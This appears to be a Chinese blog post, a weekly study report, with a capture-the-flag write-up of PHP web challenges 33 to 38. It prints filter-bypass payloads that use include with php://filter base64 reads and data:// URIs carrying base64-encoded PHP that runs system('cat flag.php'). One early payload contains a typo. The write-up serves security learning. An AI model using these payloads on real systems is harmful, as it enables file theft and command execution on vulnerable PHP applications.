第五周周报


1、web33

在这里插入图片描述
过滤这多
不过还可以用include文件包含构造payload来读取flag

?c=include$GET[a]?>&a=flag.php

伪协议读取

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

进行base64解密
在这里插入图片描述

2、web34

在这里插入图片描述
加了一些过滤发现还可以使用上题思路
payload

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
解码
在这里插入图片描述

3、web35和web36

同上题思路依旧可以

4、web37

在这里插入图片描述
可以使用data协议在include函数中执行php代码
在这里插入图片描述
构造payload

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

查看源代码
在这里插入图片描述

5、web38

在这里插入图片描述
因为咱上一题使用的base64加密解密执行的所以上一题的payload依旧可以使用

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

在这里插入图片描述

总结

学到了一些协议读取文件或者执行php代码

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值